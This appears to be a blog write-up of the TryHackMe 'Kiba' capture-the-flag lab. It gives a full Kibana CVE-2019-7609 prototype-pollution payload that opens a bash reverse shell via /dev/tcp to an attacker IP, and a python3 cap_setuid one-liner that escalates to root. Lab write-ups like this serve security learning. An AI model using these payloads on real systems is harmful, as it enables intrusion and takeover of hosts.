---
layout: post
title:  "THM - Kiba"
date:   2020-08-29 00:00:00 +1000
category: hacking
---

## Introduction
*Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.*

Alrighty; easy rated.

## Nmap
We've got four ports: SSH on 22 and HTTP on 80, plus two mystery ports in 5044 and 5601.

## Port 80
There's nothing much on the front page on Port 80 except some ASCII art and a cryptic message; nothing extra in the page source. Time to gobuster:

``
root@kali:/opt/tryhackme/kiba# gobuster dir -u http://10.10.19.10 -w /usr/share/dirb/wordlists/common.txt
``

Nothing. Let's try another port, but we'll come back to this if necessary.

## Port 5601
Visting it in the browser we find another HTTP site running **kibana**; I guess this is what we're after based on the title.

This machine is quite 'hand-holding' because the questions ask about finding a CVE for the version, so we know there is a readily available exploit. I looked at a couple of sources, the main one was [here](https://slides.com/securitymb/prototype-pollution-in-kibana) but also this [github repo](https://github.com/mpgn/CVE-2019-7609) explains it too.

Essentially it's go to the **Timelion** tab, enter the exploit code, hit play and then go to the **Canvas** tab and wait for your shell. Opening Canvas spawns a new process, and the exploit code pollutes the prototypes if I've understood this correctly.

My exploit code was:

>.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/10.9.10.123/1234 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

## On the box
As our user (kiba) we have access to the user flag. The THM page now hints that we're looking at capabilities for exploit - look, it's short enough that I'll just show it here:

{% highlight shell %}
kiba@ubuntu:/home/kiba$ getcap -r / 2>/dev/null  
getcap -r / 2>/dev/null  
/home/kiba/.hackmeplease/python3 = cap_setuid+ep  
/usr/bin/mtr = cap_net_raw+ep  
/usr/bin/traceroute6.iputils = cap_net_raw+ep  
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep  
kiba@ubuntu:/home/kiba$ /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
whoami
root
cd /root
cat root.txt
THM{FLAG_WENT_HERE}
{% endhighlight %}

And that was that.
